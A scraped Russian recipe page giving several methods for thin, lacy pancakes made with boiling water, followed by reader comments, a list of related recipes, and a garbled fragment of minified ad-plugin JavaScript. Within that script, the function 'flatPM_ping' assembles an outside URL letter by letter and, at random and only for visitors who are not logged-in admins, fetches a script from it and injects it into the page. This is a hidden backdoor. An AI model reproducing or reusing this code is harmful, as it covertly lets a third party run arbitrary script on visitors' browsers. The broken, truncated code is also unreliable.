Блины на кипятке

Блины на кипятке

В число пользующихся неизменной популярностью блюд, для чаепития в кругу семьи или приглашенных в дом гостей, входят блины. Каждая бывалая хозяйка владеет своим проверенным временем и опытом любимым рецептом, которым радует своих домочадцев.

Среди ингредиентов, которые входят в основу блинного теста, есть и молоко, и кефир, и простокваша, и сыворотка и даже обычный кипяток. Последний из перечисленных компонентов придает блинному тесту воздушности, способствует выпечке тонких, пористых блинчиков.

Как приготовить блины с добавлением кипятка — рецепт с фото

Такие блинчики отличный вариант универсального блюда к чаю, которое можно есть просто смазанными сливочным маслом или же с разнообразными начинками — от сладких до соленых.
Изюминка таких блинов — отсутствие ярко выраженного вкуса или запаха. Чтобы соблюсти эту особенность, можно воспользоваться предложенным ниже рецептом.

Ингредиенты

  • кипяток: 1 стакан,
  • молоко: 1 стакан,
  • яйца: 2 шт.,
  • сахар: 0,5 стакана,
  • мука: 400 грамм,
  • сало свежее: 1 кусочек,
  • сливочное масло: 50 грамм.

Инструкция приготовления

В чаше для миксера взбить яйца с двумя столовыми ложками сахара.

Вооружившись миксером с целью однородного смешивания ингредиентов, поочередно в чашу вводят кипяток, молоко, муку.

Избавленное от комков тесто оставляют на 15-20 минут.

По истечении этого срока можно приступать к жарке. С этой целью разогретую сковороду смазывают свежим салом.

Таким образом, в тесте отсутствует придающее ему своеобразный запах и вкус растительное масло.

Кроме того, использование для смазывания сковороды сала — залог успеха в равномерном распределении теста по дну сковороды и переворачивании блинов.

Выпекаемый таким способом блин остается сухим и с большой скоростью отлично пропекается внутри.

Снятый со сковороды блин смазывают сливочным маслом и присыпают небольшим количеством сахара, после чего сворачивают, чтобы изделие пропиталось.

На кефире с кипятком

Многие хозяйки, особенно начинающие свои кулинарные опыты, зачастую остаются не удовлетворенными результатом, приготовив тесто для блинов на кефире. Чтобы успешно выпечь блины на данной основе, рекомендуют добавление в тесто кипятка. Блины с этим ингредиентом обладают рядом преимуществ:

  • минимальная толщина,
  • пластичность,
  • пористая, воздушная поверхность.

Приготовить такие блины можно самостоятельно, имея продукты:

  • 2 стакана кефира средней жирности,
  • 2 стакана муки,
  • 1 стакан кипятка,
  • 0,5 стакана сахара,
  • 2 яйца,
  • 0,5 чайной ложки соды,
  • 3 столовые ложки масла растительного.

Приготовление:

  1. В чашке соединяют яйца и сахар. Количество сахара может быть больше, чем заявлено, в том случае, если будущие блины не намереваются начинять или есть с вареньем. Эти ингредиенты тщательно взбивают.
  2. В емкость вводят кефир, после чего массу еще раз перемешивают.
  3. Указанное количество муки просеивают и с помощью венчика порциями вводят в емкость, старательно разбивая комочки, получив в итоге довольно густое тесто.
  4. Закипевшую воду аккуратно наливают в стакан, в котором разводят соду.
  5. Кипяток с содой вливают в тесто, аккуратно вымешивая ингредиенты. Полученное тесто имеет жидкую консистенцию с множеством образованных на поверхности пузырьков.
  6. Готовое тесто оставляют на 5 минут завариваться.
  7. Последним из перечисленных продуктов в емкость добавляют растительное масло, которое в последующем позволит легко переворачивать блины.
  8. Жарят блины на хорошо раскаленной блинной сковороде, наливая тесто в объеме половины стандартного половника. Практически сразу вся поверхность блина покрывается дырочками.
  9. Для обжаривания блинов с обеих сторон достаточно двух-трех минут, после чего их можно подавать с вареньем или джемом, или использовать в качестве фаршированных какими-то начинками рулетов.

Блины на кипятке с молоком

Учитывая такой немаловажный нюанс, что подавляющее большинство хозяек традиционно готовят блины в основном на молоке, этот популярный ингредиент можно совместить в блинном тесте с кипятком, чтобы получить потрясающий эффект.

Чтобы без проблем пожарить блины такого вида, окажутся нужны:

  • по 1 стакану молока и кипятка,
  • 2 стакана муки,
  • по 2 столовые ложки сахара и рафинированного масла,
  • 2 яйца.

Процесс приготовления теста по данному рецепту довольно прост:

  1. В одной посуде смешивают сахар с разбитыми яйцами.
  2. В смесь вливают стакан закипевшей воды и заваривают содержимое.
  3. К ингредиентам добавляют молоко.
  4. По одной столовой ложке в посуду всыпают муку и тщательно взбивают миксером.
  5. Финальный штрих — добавление растительного масла.
  6. Жарят такие блины на смазанной рафинированным или топленым маслом сковороде, потратив всего лишь по минуте на каждую сторону.

Тонкие блинчики на кипятке

Наиболее тонкими с ажурным рисунком выходят блинчики, приготовленные исключительно на кипятке.

Для теста по предлагаемому рецепту хозяйке потребуются:

  • 0,5 литра кипятка,
  • 1,5 стакана муки,
  • 3 яйца,
  • 3 столовые ложки масла, предпочтительно рафинированного,
  • 3 столовые ложки сахара,
  • по щепотке соды и соли.

Приготовление:

  1. Яйца взбивают венчиком сначала с солью, потом с добавленным в емкость сахаром в течение пяти минут.
  2. Продолжая работать миксером, в посуду вливают половину указанного количества кипятка.
  3. Всыпается вся мука и тщательно перемешивается миксером, предупреждая образование комков.
  4. Во второй части кипятка разводят соду, после чего жидкость вливают в тесто.
  5. Добавив в посуду масло, ее оставляют на четверть часа.
  6. Блины жарятся на раскаленной сковороде. Для достижения мягкости, маслом их не смазывают.
  7. Готовые блины кладут в глубокое блюдо и держат для пропаривания под крышкой. Пожаренные поэтому рецепты блины идеально подходят для фаршировки.

Как приготовить заварные блины с кипятком

Блины, приготовленные на кипятке имеют еще одно название — заварные. Взяв за основу всего лишь стакан кипятка, можно получить пару десятков ажурных и вкусных блинчиков.

Для приготовления таких блинов можно воспользоваться продемонстрированным далее рецептом.

Хозяйке для работы окажутся нужны:

  • 2 стакана молока,
  • по 1 стакану кипятка и охлажденной кипяченой воды,
  • 1,5 стакана муки,
  • 3 яйца,
  • 3 столовых ложки растительного масла с отсутствием характерного запаха,
  • по 0,5 чайной ложки соды и соли,
  • 1 столовая ложка сахара.

Приготовление:

  1. В глубокой емкости миксером взбивают молоко с яйцами.
  2. В полученную смесь вводят сахар, после чего вливают охлажденную воду.
  3. В посуду всыпают муку, которую тщательно перемешивают с остальными ингредиентами.
  4. Кипяток с разбавленной в нем содой быстро вводят в тесто, не переставая его взбивать.
  5. Посуду с тестом оставляют на 10 минут, после чего в нее вливают масло.
  6. Жарить блины из такого теста необходимо на раскаленной сковороде, предварительно смазав ее один раз в начале процесса жиром без запаха.

Обладающие нейтральным вкусом заварные блины могут стать универсальной закуской с начинкой или десертом к чаю, дополненные повидлом или другими сладостями.

Кружевные блинчики на кипятке 🙂

Блины, приготовленные по этому рецепту, получаются всегда, и при этом они не только очень вкусные, но еще и красивые.

Блинчики очень тонкие и все в дырочку (романтикам может показаться, что похожи на звездное небо). Если вам такие по душе, то обязательно попробуйте приготовить.

Ингредиенты

  • 300 г муки;
  • 300 мл кипятка;
  • 2 яйца;
  • 3 ст. ложки сахара;
  • 1/3 ч. ложки соли;
  • 500 мл кефира (лучше жирного);
  • 1 ч. ложка соды (без горки);
  • ванилин (по вкусу);
  • 100 мл растительного масла.

Приготовление

Сначала нужно взбить венчиком яйца с сахаром и солью до легкой пышности.

Продолжая взбивать добавить кефир.

Затем частями ввести муку размешав тесто до гладкого однородного состояния, чтобы не было комочков.

Тесто получается достаточно густое, но прошу не волноваться на этом этапе, именно таким оно должно и быть.

Соду высыпать в высокую кружку и залить кипятком, размешать и сразу добавить в тесто.

Тщательно перемешать и оставить тесто на 30 минут отдохнуть. Затем добавить растительное масло и хорошо перемешать. Жарить блинчики с двух сторон до золотистого цвета, смазав сковородку маслом только под первый блин.

Подавать можно с вареньем, медом, сметаной, молоком — это дело вкуса.

Блинчики необыкновенно вкусные, их вполне можно приготовить на завтрак, обед или ужин.
Пробуйте и наслаждайтесь!

Ох и наелись мы на масленой неделе блинчиков-от пуза. Но уже опять хочется! Марина-красавцы! Тоже люблю в дырочку!

Марина, я каждый день пекла!, кроме 6 марта (ДР сына), но тогда был торт))) — не меньше калорий!

дрожжевые (толстые)

Блины супер! Сегодня все оценили, только я подсластила еще чуток тесто.

кружевной

Марина, вкуснятина Обожаю блины и блинчики
Марина, мои ++++++++++++…
Я в этом году что-то не насытился в период Масленицы блинами, и поэтому обязательно попробую твой вариант на днях, я люблю разные модификации блинчиков, а твой вариант не пробовал никогда Спасибо большое Я тут подсел на гречневые дрожжевые блины, тоже всегда в дырочку и нежные-нежные получаются

Простые и вкусные рецепты выпечки заварных блинов на кипятке с фото от наших кулинаров

Ажурные блины на кефире с кипятком

Вам нравятся тонкие ажурные блины? Мне – очень! Итак, готовим тоненькие, ажурные .

Блины на кефире с содой и кипятком

Обычно блины на кефире получаются более плотными и не такими нежными, как .

Заварные блины

Заварные блины на молоке – очень нежные, ажурные и вкусные. Для приготовления .

Блины на кипятке с кефиром

Хочу поделиться рецептом блинов на кипятке с кефиром. В моём рецепте есть .

Блинчики из сгущённого молока на кипятке

Предлагаю вам испечь вкуснейшие блины из сгущённого молока. Готовятся они на .

Заварные блины на кефире и кипятке

Блины со сгущенкой, вареньем, сметаной и особенно с красной икрой – это очень .

Блины на питьевом йогурте

Если вы ни разу не готовили блины на питьевом йогурте, очень советую вам .

Ажурные блины на молоке с кипятком

Хочу познакомить вас с одним из своих любимейших рецептов приготовления .

Блины с картошкой и грибами

Блины – это отдельная история в нашей семье. Во-первых я их пеку очень часто, .

Блины на кислом молоке (простокваше)

Если у вас прокисло молоко – не расстраивайтесь и не спешите его выливать. .

Тонкие дрожжевые блины на кефире

Предлагаю вам приготовить замечательные дрожжевые блины на кефире. Эти блинчики .

Блины с капустой и яйцом

Недавно открыла для себя вкусную и сытную начинку для блинов – из капусты и яиц. .

Блины “Вологодские кружева”

Рецепт приготовления тонких, нежных, вкусных, кружевных блинов, замешанных на .

Рецепт заварных блинов на молоке с сыром

Для любителей блинчиков с припеком предлагаю рецепт заварных блинов на молоке с .

Гречневые заварные блины

Предлагаю вам попробовать заварные блины из гречневой муки. Одна из особенностей .

Заварные блины на воде

Хочу предложить простой рецепт приготовления заварных блинов на воде. .

Кружевные блины на кефире

Если вы решили побаловать свою семью блинчиками, предлагаю попробовать .

Читать еще:  Рассольник в мультиварке

Рецепт блинов на молоке с кипятком

Тонкие блины, приготовленные на молоке с кипятком по этому рецепту, – одно из .

Блины из кабачков с чесноком

Я раньше из кабачков готовила только оладьи, но решила попробовать сделать блины .

Кокосовые блинчики

Рецепт этих чудесных блинчиков я встретила на страничке блога у своей знакомой, .

Блины с маком

Сегодня я предлагаю простой рецепт блинов с маком. Блинчики получаются красивыми .

Блины “Осенние”

С наступлением осенних холодов и первых заморозков хочется более сытной и .

Блины с припеком или фальшивые чебуреки

Этот рецепт блинов с припеком или как их ещё называют “фальшивых чебуреков” .

Блинчики с маком

При всё многообразии рецептов приготовления блинов, всегда хочется попробовать .

Если Вы не нашли, то что искали, в этом разделе.
Воспользуйтесь поиском по всему сайту.

Блины на кипятке с молоком

Описание приготовления

Тонкие блины с ажурными дырочками произведут впечатление даже на поклонников здорового образа жизни и правильного питания. От воздушного лакомства, которое буквально тает во рту, невозможно отказаться. Даже если уже наелся вдоволь.

Чтобы побаловать себя и близких тонкими кружевными блинами на молоке, не обязательно дожидаться Масленицы. Такое блюдо можно приготовить на завтрак, воспользовавшись проверенным и простым рецептом. На готовку уйдёт не больше получаса, а результат вас приятно удивит.

У каждой хозяйки найдётся свой, особенный рецепт лакомства. Чтобы блины на молоке получались более пышными и воздушными, кулинары прибегают к маленьким хитростям. Возьмите их на заметку и вы:

1. Строго соблюдайте пропорции ингредиентов в рецепте. Готовое тесто должно напоминать по консистенции сметану.

2. Вне зависимости от особенностей рецепта, старайтесь просеивать муку дважды. Такая хитрость сделает выпечку воздушной и нежной.

3. В большинстве рецептов используется тёплое молоко. Однако некоторые хозяйки рекомендуют в блинное тесто добавлять кипяток и холодное молоко в одинаковых пропорциях.

4. Если тесто по выбранному рецепту получилось слишком густым, добавьте немного тёплой воды.

5. Старайтесь не перемешивать тесто перед выливанием на сковороду. Иначе выпечка потеряет пышность и воздушность.

Готовое блюдо смазывайте небольшим количеством сливочного масла. Оно не даст лакомству заветриться, придаст изысканные молочные нотки.

Ингредиенты

кипяток — 250 мл;

пшеничная мука — 400 г;

масло растительное — 50 г;

сахар-песок — 100 г;

Как приготовить “Блины на кипятке с молоком”

Осваивать искусство приготовления блинов лучше по проверенному и простому рецепту. Его можно назвать универсальным, ведь многие ингредиенты легко заменить. Например, если вы хотите приготовить постную выпечку, уберите из списка ингредиентов молоко, оставив только горячую воду. Яйца тоже можно исключить, однако вместо них в рецепте придётся использовать соду.

Из утвари понадобится миска для замеса теста, венчик или миксер, половник, лопатка и сковорода с толстым дном. Если вы ещё не пользовались этим рецептом и боитесь, что выпечка может не получиться, используйте антипригарную посуду.

В глубокой чаше взбейте яйца, добавьте сахар и соль, тщательно перемешайте ингредиенты. Используйте венчик или миксер.

Добавьте в яичную смесь кипяток, стакан молока.

Дважды просейте муку, добавьте её к другим ингредиентам. Старайтесь вводить муку небольшими порциями, иначе тесто собьётся комочками.

Добавьте к ингредиентам растительное масло. Благодаря ему, выпечка не будет прилипать к сковороде.

Выливайте тесто порциями на разогретую сковороду, смазанную сливочным маслом или салом. Обжаривайте лакомство с двух сторон по 1,5–3 минуты.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};